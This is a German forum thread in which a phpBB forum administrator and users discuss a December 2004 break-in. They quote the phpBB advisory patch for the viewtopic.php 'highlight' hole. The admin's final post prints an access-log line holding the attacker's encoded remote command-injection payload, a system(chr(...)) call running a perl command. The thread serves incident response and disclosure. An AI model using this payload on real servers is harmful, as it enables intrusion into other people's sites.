Wurm ? gehackt ?
#1 Wurm ? gehackt ?
Hi,
war heute n8 das Forum gehackt ?
Ist denn das phpbb 2.0.1 nicht sicher ?
Ich dachte das wär gefixt .. heul
war heute n8 das Forum gehackt ?
Ist denn das phpbb 2.0.1 nicht sicher ?
Ich dachte das wär gefixt .. heul
#2
Ich bin noch am reparieren.
Ich war seit zwei Stunden auf dem Rechner, bastelte an einer anderen Site, als mein VI mir erzählte, dass die Datei auf der Platte geändert wurde, an der ich gerade arbeite.
Ich versuche jetzt aus dem Backup alles zu recover, weiss aber nicht nicht, was passiert ist
mfg,
tracer
Ich war seit zwei Stunden auf dem Rechner, bastelte an einer anderen Site, als mein VI mir erzählte, dass die Datei auf der Platte geändert wurde, an der ich gerade arbeite.
Ich versuche jetzt aus dem Backup alles zu recover, weiss aber nicht nicht, was passiert ist
mfg,
tracer
#3
,
solche A***löcher, jetzt ist irgendwem ein achterl abgegangen oder wie ??..
Voll sinnig solche Aktionen
Richard
solche A***löcher, jetzt ist irgendwem ein achterl abgegangen oder wie ??..
Voll sinnig solche Aktionen
Richard
derzeit: Sim
______________________________________________________
My Home http://www.reverbnation.com/bbmmp
"Aufgeben gibts nicht..." ".....oft findet man den Sieg in der Niederlage......
______________________________________________________
My Home http://www.reverbnation.com/bbmmp
"Aufgeben gibts nicht..." ".....oft findet man den Sieg in der Niederlage......
#4
Ja, ich bin auch ganz schön gallig.
Ich vermute, ein Exploit im phpbb, kann es aber noch nicht genau sagen.
Ich vermute, ein Exploit im phpbb, kann es aber noch nicht genau sagen.
#5
is das der hier evtl?Following my original post it has been brought to our attention that the highlighting exploit can be taken advantage of, and it a serious way. We are hastily preparing a new release. However that release contains a number of other fixes and additions and thus we carrying out some internal testing to limit the chances of other issues arising.
In the mean time we strongly, and I mean strongly! urge all our users to make the following change to viewtopic.php as a matter of urgency.
Open viewtopic.php in any text editor. Find the following section of code:
Code:and replace with:Code: Alles auswählen
// // Was a highlight request part of the URI? // $highlight_match = $highlight = ''; if (isset($HTTP_GET_VARS['highlight'])) { // Split words and phrases $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight'])))); for($i = 0; $i < sizeof($words); $i++) {
Code:Please inform as many people as possible about this issue. If you're a hosting provider please inform your customers if possible. Else we advise you implement some level of additional security if you run ensim or have PHP running cgi under suexec, etc.Code: Alles auswählen
// // Was a highlight request part of the URI? // $highlight_match = $highlight = ''; if (isset($HTTP_GET_VARS['highlight'])) { // Split words and phrases $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight']))); for($i = 0; $i < sizeof($words); $i++) {
hab ich grad gefunden in google
ich werde das grade mal testen, hoffe du hast nix dagegen
MfG Dominik
#7
So, habe das jetzt hier gefixed, und die Berechtigungen noch schärfer angezogen.
In TzaZickes Forum ist schon 2.0.11 im Einsatz.
mfg,
tracer
In TzaZickes Forum ist schon 2.0.11 im Einsatz.
mfg,
tracer
#11
Also, nu haben wirs, war nen Script Kiddie, das ne bekannte Sicherheitslücke mit bekannten Exploit verwendet hat.
Passiert mir nicht nochmal, hoffe ich.
Hier die Details, falls jemand Interesse hat:
195.149.227.13 - - [21/Dec/2004:07:11:29 +0100] "GET /viewtopic.php?p=4364&sid=dab898a1247b8ba2cd6ade97a0f04c31&highlight=%25
27%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%25
2echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%25
2echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%25
2echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%
252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%2
52echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%25
2echr(34))%252e%2527 HTTP/1.0" 200 139054 "http://www.rchelifan.org/viewtopic.php? ... de97a0f04c
31&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32
)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)
%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102
)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(11
0)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(11
1)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
und davon folgen dann halt etliche Einträge...
mfg,
tracer
Passiert mir nicht nochmal, hoffe ich.
Hier die Details, falls jemand Interesse hat:
195.149.227.13 - - [21/Dec/2004:07:11:29 +0100] "GET /viewtopic.php?p=4364&sid=dab898a1247b8ba2cd6ade97a0f04c31&highlight=%25
27%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%25
2echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%25
2echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%25
2echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%
252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%2
52echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%25
2echr(34))%252e%2527 HTTP/1.0" 200 139054 "http://www.rchelifan.org/viewtopic.php? ... de97a0f04c
31&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32
)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)
%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102
)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(11
0)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(11
1)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
und davon folgen dann halt etliche Einträge...
mfg,
tracer